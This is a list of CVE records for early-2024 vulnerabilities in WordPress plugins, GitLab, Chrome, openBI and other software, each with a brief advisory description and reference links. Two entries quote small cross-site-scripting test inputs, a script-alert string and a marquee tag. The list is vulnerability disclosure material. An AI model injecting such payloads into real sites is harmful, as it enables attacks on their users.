CVE    2024    1071    Candidate    The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the 'sorting' parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.8.2/includes/core/class-member-directory-meta.php?rev=3022076   |   URL:https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.8.2/includes/core/class-member-directory-meta.php?rev=3022076   |   MISC:https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.8.2/includes/core/class-member-directory-meta.php?rev=3022076#L666   |   URL:https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.8.2/includes/core/class-member-directory-meta.php?rev=3022076#L666   |   MISC:https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.8.2/includes/core/class-member-directory-meta.php?rev=3022076#L858   |   URL:https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.8.2/includes/core/class-member-directory-meta.php?rev=3022076#L858   |   MISC:https://plugins.trac.wordpress.org/changeset/3038036/ultimate-member/trunk/includes/core/class-member-directory-meta.php   |   URL:https://plugins.trac.wordpress.org/changeset/3038036/ultimate-member/trunk/includes/core/class-member-directory-meta.php   |   MISC:https://wordpress.org/plugins/ultimate-member/   |   URL:https://wordpress.org/plugins/ultimate-member/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/005fa621-3c49-4c23-add5-d6b7a9110055?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/005fa621-3c49-4c23-add5-d6b7a9110055?source=cve    Assigned (20240130)
CVE    2024    1070    Candidate    The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the features attribute in all versions up to, and including, 1.58.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/so-widgets-bundle/widgets/features/tpl/default.php#L26   |   URL:https://plugins.trac.wordpress.org/browser/so-widgets-bundle/widgets/features/tpl/default.php#L26   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3031864%40so-widgets-bundle%2Ftrunk&old=3027675%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3031864%40so-widgets-bundle%2Ftrunk&old=3027675%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a8b6dafb-7b2f-4459-95bd-eb7e147a4466?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a8b6dafb-7b2f-4459-95bd-eb7e147a4466?source=cve    Assigned (20240130)
CVE    2024    1069    Candidate    The Contact Form Entries plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation on the 'view_page' function in versions up to, and including, 1.3.2. This makes it possible for authenticated attackers with administrator-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.    MISC:https://plugins.trac.wordpress.org/browser/contact-form-entries/trunk/includes/plugin-pages.php?rev=3003884#L1213   |   URL:https://plugins.trac.wordpress.org/browser/contact-form-entries/trunk/includes/plugin-pages.php?rev=3003884#L1213   |   MISC:https://plugins.trac.wordpress.org/changeset/3028640/contact-form-entries#file1   |   URL:https://plugins.trac.wordpress.org/changeset/3028640/contact-form-entries#file1   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/120313be-9f98-4448-9f5d-a77186a6ff08?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/120313be-9f98-4448-9f5d-a77186a6ff08?source=cve    Assigned (20240130)
CVE    2024    1068    Candidate    The 404 Solution WordPress plugin before 2.35.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admins.    MISC:https://wpscan.com/vulnerability/25e3c1a1-3c45-41df-ae50-0e20d86c5484/   |   URL:https://wpscan.com/vulnerability/25e3c1a1-3c45-41df-ae50-0e20d86c5484/    Assigned (20240130)
CVE    2024    1066    Candidate    An issue has been discovered in GitLab EE affecting all versions from 13.3.0 prior to 16.6.7, 16.7 prior to 16.7.5, and 16.8 prior to 16.8.2 which allows an attacker to cause resource exhaustion using GraphQL `vulnerabilitiesCountByDay`.    MISC:GitLab Issue #420341   |   URL:https://gitlab.com/gitlab-org/gitlab/-/issues/420341    Assigned (20240130)
CVE    2024    1064    Candidate    A host header injection vulnerability in the HTTP handler component of Crafty Controller allows a remote, unauthenticated attacker to trigger a Denial of Service (DoS) condition via a modified host header.    MISC:GitLab Issue #327   |   URL:https://gitlab.com/crafty-controller/crafty-4/-/issues/327    Assigned (20240130)
CVE    2024    1063    Candidate    Appwrite <= v1.4.13 is affected by a Server-Side Request Forgery (SSRF) via the '/v1/avatars/favicon' endpoint due to an incomplete fix of CVE-2023-27159.    MISC:https://www.tenable.com/security/research/tra-2024-03   |   URL:https://www.tenable.com/security/research/tra-2024-03    Assigned (20240130)
CVE    2024    1062    Candidate    A heap overflow flaw was found in 389-ds-base. This issue leads to a denial of service when writing a value larger than 256 chars in log_entry_attr.    MISC:RHBZ#2261879   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2261879   |   MISC:RHSA-2024:1074   |   URL:https://access.redhat.com/errata/RHSA-2024:1074   |   MISC:RHSA-2024:1372   |   URL:https://access.redhat.com/errata/RHSA-2024:1372   |   MISC:https://access.redhat.com/security/cve/CVE-2024-1062   |   URL:https://access.redhat.com/security/cve/CVE-2024-1062   |   MISC:https://bugzilla.redhat.com/show_bug.cgi?id=2256711   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2256711    Assigned (20240130)
CVE    2024    1061    Candidate    The 'HTML5 Video Player' WordPress Plugin, version < 2.5.25 is affected by an unauthenticated SQL injection vulnerability in the 'id' parameter in the 'get_view' function.    MISC:https://www.tenable.com/security/research/tra-2024-02   |   URL:https://www.tenable.com/security/research/tra-2024-02    Assigned (20240130)
CVE    2024    1060    Candidate    Use after free in Canvas in Google Chrome prior to 121.0.6167.139 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-87e0baecb6   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NEUXJY3YC3VGIJW2AOHL4NZ7ZK7BRYWY/   |   FEDORA:FEDORA-2024-ca36dcc1d3   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XCVKRHRWPMITSVFBHQBSNXOVJAKT547Q/   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_30.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_30.html   |   MISC:https://crbug.com/1511567   |   URL:https://crbug.com/1511567    Assigned (20240130)
CVE    2024    1059    Candidate    Use after free in Peer Connection in Google Chrome prior to 121.0.6167.139 allowed a remote attacker to potentially exploit stack corruption via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-87e0baecb6   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NEUXJY3YC3VGIJW2AOHL4NZ7ZK7BRYWY/   |   FEDORA:FEDORA-2024-ca36dcc1d3   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XCVKRHRWPMITSVFBHQBSNXOVJAKT547Q/   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_30.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_30.html   |   MISC:https://crbug.com/1514777   |   URL:https://crbug.com/1514777    Assigned (20240130)
CVE    2024    1058    Candidate    The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the onclick parameter in all versions up to, and including, 1.58.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 1.58.3 offers a partial fix.    MISC:https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.58.2/widgets/button/tpl/default.php#L22   |   URL:https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.58.2/widgets/button/tpl/default.php#L22   |   MISC:https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.58.3/base/base.php#L404   |   URL:https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.58.3/base/base.php#L404   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3031864%40so-widgets-bundle%2Ftrunk&old=3027675%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3031864%40so-widgets-bundle%2Ftrunk&old=3027675%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3033967%40so-widgets-bundle%2Ftrunk&old=3031864%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3033967%40so-widgets-bundle%2Ftrunk&old=3031864%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ffeb766f-3684-4eec-bacb-bbf0d434aba0?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ffeb766f-3684-4eec-bacb-bbf0d434aba0?source=cve    Assigned (20240129)
CVE    2024    1055    Candidate    The PowerPack Addons for Elementor (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's buttons in all versions up to, and including, 2.7.14 due to insufficient input sanitization and output escaping on user supplied URL values. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/powerpack-lite-for-elementor/trunk/modules/buttons/widgets/buttons.php#L1544   |   URL:https://plugins.trac.wordpress.org/browser/powerpack-lite-for-elementor/trunk/modules/buttons/widgets/buttons.php#L1544   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030473%40powerpack-lite-for-elementor&new=3030473%40powerpack-lite-for-elementor&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030473%40powerpack-lite-for-elementor&new=3030473%40powerpack-lite-for-elementor&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/036cf299-80c2-48a8-befc-02899ab96e3c?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/036cf299-80c2-48a8-befc-02899ab96e3c?source=cve    Assigned (20240129)
CVE    2024    1054    Candidate    The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wcj_product_barcode' shortcode in all versions up to, and including, 7.1.6 due to insufficient input sanitization and output escaping on user supplied attributes like 'color'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034358%40woocommerce-jetpack&new=3034358%40woocommerce-jetpack&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034358%40woocommerce-jetpack&new=3034358%40woocommerce-jetpack&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c0b86c45-c346-4df7-844e-01de027bbc1e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c0b86c45-c346-4df7-844e-01de027bbc1e?source=cve    Assigned (20240129)
CVE    2024    1053    Candidate    The Event Tickets and Registration plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'email' action in all versions up to, and including, 5.8.1. This makes it possible for authenticated attackers, with contributor-level access and above, to email the attendees list to themselves.    MISC:https://plugins.trac.wordpress.org/changeset/3038150/event-tickets/tags/5.8.2/src/Tickets/Commerce/Reports/Attendees.php   |   URL:https://plugins.trac.wordpress.org/changeset/3038150/event-tickets/tags/5.8.2/src/Tickets/Commerce/Reports/Attendees.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a7839847-2637-4a0d-bfc1-5f80b8433e24?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a7839847-2637-4a0d-bfc1-5f80b8433e24?source=cve    Assigned (20240129)
CVE    2024    1052    Candidate    Boundary and Boundary Enterprise (“Boundary”) is vulnerable to session hijacking through TLS certificate tampering. An attacker with privileges to enumerate active or pending sessions, obtain a private key pertaining to a session, and obtain a valid trust on first use (TOFU) token may craft a TLS certificate to hijack an active session and gain access to the underlying service or application.    MISC:https://discuss.hashicorp.com/t/hcsec-2024-02-boundary-vulnerable-to-session-hijacking-through-tls-certificate-tampering/62458   |   URL:https://discuss.hashicorp.com/t/hcsec-2024-02-boundary-vulnerable-to-session-hijacking-through-tls-certificate-tampering/62458    Assigned (20240129)
CVE    2024    1049    Candidate    The Page Builder Gutenberg Blocks – CoBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Icon Widget in all versions up to, and including, 3.1.6 due to insufficient input sanitization and output escaping on the link value. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049222%40vimeography&new=3049222%40vimeography&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049222%40vimeography&new=3049222%40vimeography&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/56d1d152-946f-47c9-b0d5-76513370677f?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/56d1d152-946f-47c9-b0d5-76513370677f?source=cve    Assigned (20240129)
CVE    2024    1048    Candidate    A flaw was found in the grub2-set-bootflag utility of grub2. After the fix of CVE-2019-14865, grub2-set-bootflag will create a temporary file with the new grubenv content and rename it to the original grubenv file. If the program is killed before the rename operation, the temporary file will not be removed and may fill the filesystem when invoked multiple times, resulting in a filesystem out of free inodes or blocks.    CONFIRM:https://security.netapp.com/advisory/ntap-20240223-0007/   |   FEDORA:FEDORA-2024-097eb22907   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XRZQCVZ3XOASVFT6XLO7F2ZXOLOHIJZQ/   |   FEDORA:FEDORA-2024-c1fabee30e   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YSJAEGRR3XHMBBBKYOVMII4P34IXEYPE/   |   MISC:RHBZ#2256827   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2256827   |   MISC:http://www.openwall.com/lists/oss-security/2024/02/06/3   |   URL:http://www.openwall.com/lists/oss-security/2024/02/06/3   |   MISC:https://access.redhat.com/security/cve/CVE-2024-1048   |   URL:https://access.redhat.com/security/cve/CVE-2024-1048   |   MISC:https://www.openwall.com/lists/oss-security/2024/02/06/3   |   URL:https://www.openwall.com/lists/oss-security/2024/02/06/3    Assigned (20240129)
CVE    2024    1047    Candidate    The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the register_reference() function in all versions up to, and including, 2.10.28. This makes it possible for unauthenticated attackers to update the connected API keys.    MISC:https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/themeisle-sdk/src/Modules/Promotions.php#L175   |   URL:https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/themeisle-sdk/src/Modules/Promotions.php#L175   |   MISC:https://plugins.trac.wordpress.org/changeset/3029507/themeisle-companion/tags/2.10.29/vendor/codeinwp/themeisle-sdk/src/Modules/Promotions.php   |   URL:https://plugins.trac.wordpress.org/changeset/3029507/themeisle-companion/tags/2.10.29/vendor/codeinwp/themeisle-sdk/src/Modules/Promotions.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6147582f-578a-47ad-b16c-65c37896783d?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6147582f-578a-47ad-b16c-65c37896783d?source=cve    Assigned (20240129)
CVE    2024    1046    Candidate    The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin 'reg-number-field' shortcode in all versions up to, and including, 4.14.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3030229/wp-user-avatar/trunk/src/ShortcodeParser/Builder/FieldsShortcodeCallback.php   |   URL:https://plugins.trac.wordpress.org/changeset/3030229/wp-user-avatar/trunk/src/ShortcodeParser/Builder/FieldsShortcodeCallback.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7911c774-3fb0-4d6c-a847-101e5ad8637a?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7911c774-3fb0-4d6c-a847-101e5ad8637a?source=cve    Assigned (20240129)
CVE    2024    1044    Candidate    The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'submit_review' function in all versions up to, and including, 5.38.12. This makes it possible for unauthenticated attackers to submit reviews with arbitrary email addresses regardless of whether reviews are globally enabled.    MISC:https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.38.12&old=3032310&new_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.39.0&new=3032310&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.38.12&old=3032310&new_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.39.0&new=3032310&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4420c334-1ea4-4549-b391-150702abc2f8?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4420c334-1ea4-4549-b391-150702abc2f8?source=cve    Assigned (20240129)
CVE    2024    1043    Candidate    The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'amppb_remove_saved_layout_data' function in all versions up to, and including, 1.0.93.1. This makes it possible for authenticated attackers, with contributor access and above, to delete arbitrary posts on the site.    MISC:https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/tags/1.0.93.1/pagebuilder/inc/adminAjaxContents.php#L134   |   URL:https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/tags/1.0.93.1/pagebuilder/inc/adminAjaxContents.php#L134   |   MISC:https://plugins.trac.wordpress.org/changeset/3030425/accelerated-mobile-pages/tags/1.0.93.2/pagebuilder/inc/adminAjaxContents.php?old=3025105&old_path=accelerated-mobile-pages%2Ftags%2F1.0.93.1%2Fpagebuilder%2Finc%2FadminAjaxContents.php   |   URL:https://plugins.trac.wordpress.org/changeset/3030425/accelerated-mobile-pages/tags/1.0.93.2/pagebuilder/inc/adminAjaxContents.php?old=3025105&old_path=accelerated-mobile-pages%2Ftags%2F1.0.93.1%2Fpagebuilder%2Finc%2FadminAjaxContents.php   |   MISC:https://wordpress.org/plugins/accelerated-mobile-pages/   |   URL:https://wordpress.org/plugins/accelerated-mobile-pages/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ffb70e82-355b-48f3-92d0-19659ed2550e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ffb70e82-355b-48f3-92d0-19659ed2550e?source=cve    Assigned (20240129)
CVE    2024    1040    Candidate    Gessler GmbH WEB-MASTER user account is stored using a weak hashing algorithm. The attacker can restore the passwords by breaking the hashes stored on the device.    MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-032-01   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-032-01    Assigned (20240129)
CVE    2024    1039    Candidate    Gessler GmbH WEB-MASTER has a restoration account that uses weak hard-coded credentials which, if exploited, could allow an attacker control over the web management of the device.    MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-032-01   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-032-01    Assigned (20240129)
CVE    2024    1038    Candidate    The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to DOM-Based Reflected Cross-Site Scripting via a 'playground.wordpress.net' parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/js/fl-builder.js#L1578   |   URL:https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/js/fl-builder.js#L1578   |   MISC:https://plugins.trac.wordpress.org/changeset/3032809/beaver-builder-lite-version/tags/2.7.4.3/js/fl-builder.js?old=3012561&old_path=beaver-builder-lite-version/tags/2.7.4.2/js/fl-builder.js   |   URL:https://plugins.trac.wordpress.org/changeset/3032809/beaver-builder-lite-version/tags/2.7.4.3/js/fl-builder.js?old=3012561&old_path=beaver-builder-lite-version/tags/2.7.4.2/js/fl-builder.js   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e2cc2776-9496-42b5-a242-c572ae5462fb?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e2cc2776-9496-42b5-a242-c572ae5462fb?source=cve    Assigned (20240129)
CVE    2024    1037    Candidate    The All-In-One Security (AIOS) – Security and Firewall plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 5.2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/all-in-one-wp-security-and-firewall/trunk/admin/wp-security-list-404.php#L32   |   URL:https://plugins.trac.wordpress.org/browser/all-in-one-wp-security-and-firewall/trunk/admin/wp-security-list-404.php#L32   |   MISC:https://plugins.trac.wordpress.org/browser/all-in-one-wp-security-and-firewall/trunk/admin/wp-security-list-404.php#L50   |   URL:https://plugins.trac.wordpress.org/browser/all-in-one-wp-security-and-firewall/trunk/admin/wp-security-list-404.php#L50   |   MISC:https://plugins.trac.wordpress.org/changeset/3032127/all-in-one-wp-security-and-firewall/tags/5.2.6/admin/wp-security-list-404.php   |   URL:https://plugins.trac.wordpress.org/changeset/3032127/all-in-one-wp-security-and-firewall/tags/5.2.6/admin/wp-security-list-404.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b50772e5-5142-4f50-b5c0-6116a8821cba?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b50772e5-5142-4f50-b5c0-6116a8821cba?source=cve    Assigned (20240129)
CVE    2024    1036    Candidate    A vulnerability was found in openBI up to 1.0.8 and classified as critical. This issue affects the function uploadIcon of the file /application/index/controller/Screen.php of the component Icon Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252311.    MISC:https://note.zhaoj.in/share/X1ASzPP5rHel   |   URL:https://note.zhaoj.in/share/X1ASzPP5rHel   |   MISC:https://vuldb.com/?ctiid.252311   |   URL:https://vuldb.com/?ctiid.252311   |   MISC:https://vuldb.com/?id.252311   |   URL:https://vuldb.com/?id.252311    Assigned (20240129)
CVE    2024    1035    Candidate    A vulnerability has been found in openBI up to 1.0.8 and classified as critical. This vulnerability affects the function uploadIcon of the file /application/index/controller/Icon.php. The manipulation of the argument image leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252310 is the identifier assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/AIbnbytIW9Bq   |   URL:https://note.zhaoj.in/share/AIbnbytIW9Bq   |   MISC:https://vuldb.com/?ctiid.252310   |   URL:https://vuldb.com/?ctiid.252310   |   MISC:https://vuldb.com/?id.252310   |   URL:https://vuldb.com/?id.252310    Assigned (20240129)
CVE    2024    1034    Candidate    A vulnerability, which was classified as critical, was found in openBI up to 1.0.8. This affects the function uploadFile of the file /application/index/controller/File.php. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252309 was assigned to this vulnerability.    MISC:https://note.zhaoj.in/share/ABYkFE4wRPW5   |   URL:https://note.zhaoj.in/share/ABYkFE4wRPW5   |   MISC:https://vuldb.com/?ctiid.252309   |   URL:https://vuldb.com/?ctiid.252309   |   MISC:https://vuldb.com/?id.252309   |   URL:https://vuldb.com/?id.252309    Assigned (20240129)
CVE    2024    1033    Candidate    A vulnerability, which was classified as problematic, has been found in openBI up to 1.0.8. Affected by this issue is the function agent of the file /application/index/controller/Datament.php. The manipulation of the argument api leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252308.    MISC:https://note.zhaoj.in/share/nD654ot6zRQZ   |   URL:https://note.zhaoj.in/share/nD654ot6zRQZ   |   MISC:https://vuldb.com/?ctiid.252308   |   URL:https://vuldb.com/?ctiid.252308   |   MISC:https://vuldb.com/?id.252308   |   URL:https://vuldb.com/?id.252308    Assigned (20240129)
CVE    2024    1032    Candidate    A vulnerability classified as critical was found in openBI up to 1.0.8. Affected by this vulnerability is the function testConnection of the file /application/index/controller/Databasesource.php of the component Test Connection Handler. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252307.    MISC:https://note.zhaoj.in/share/6ISYe2urjlkI   |   URL:https://note.zhaoj.in/share/6ISYe2urjlkI   |   MISC:https://vuldb.com/?ctiid.252307   |   URL:https://vuldb.com/?ctiid.252307   |   MISC:https://vuldb.com/?id.252307   |   URL:https://vuldb.com/?id.252307    Assigned (20240129)
CVE    2024    1031    Candidate    A vulnerability was found in CodeAstro Expense Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file templates/5-Add-Expenses.php of the component Add Expenses Page. The manipulation of the argument item leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252304.    MISC:https://docs.qq.com/doc/DYmhqV3piekZ5dlZi   |   URL:https://docs.qq.com/doc/DYmhqV3piekZ5dlZi   |   MISC:https://vuldb.com/?ctiid.252304   |   URL:https://vuldb.com/?ctiid.252304   |   MISC:https://vuldb.com/?id.252304   |   URL:https://vuldb.com/?id.252304    Assigned (20240129)
CVE    2024    1030    Candidate    A vulnerability was found in Cogites eReserv 7.7.58. It has been classified as problematic. This affects an unknown part of the file /front/admin/tenancyDetail.php. The manipulation of the argument id leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-252303.    MISC:https://vuldb.com/?ctiid.252303   |   URL:https://vuldb.com/?ctiid.252303   |   MISC:https://vuldb.com/?id.252303   |   URL:https://vuldb.com/?id.252303    Assigned (20240129)
CVE    2024    1029    Candidate    A vulnerability was found in Cogites eReserv 7.7.58 and classified as problematic. Affected by this issue is some unknown functionality of the file /front/admin/tenancyDetail.php. The manipulation of the argument Nom with the input Dreux"><script>alert('XSS')</script> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252302 is the identifier assigned to this vulnerability.    MISC:https://vuldb.com/?ctiid.252302   |   URL:https://vuldb.com/?ctiid.252302   |   MISC:https://vuldb.com/?id.252302   |   URL:https://vuldb.com/?id.252302    Assigned (20240129)
CVE    2024    1028    Candidate    A vulnerability has been found in SourceCodester Facebook News Feed Like 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Post Handler. The manipulation of the argument Description with the input <marquee>HACKED</marquee> leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252301 was assigned to this vulnerability.    MISC:https://vuldb.com/?ctiid.252301   |   URL:https://vuldb.com/?ctiid.252301   |   MISC:https://vuldb.com/?id.252301   |   URL:https://vuldb.com/?id.252301    Assigned (20240129)
CVE    2024    1027    Candidate    A vulnerability, which was classified as critical, was found in SourceCodester Facebook News Feed Like 1.0. Affected is an unknown function of the component Post Handler. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-252300.    MISC:https://vuldb.com/?ctiid.252300   |   URL:https://vuldb.com/?ctiid.252300   |   MISC:https://vuldb.com/?id.252300   |   URL:https://vuldb.com/?id.252300    Assigned (20240129)
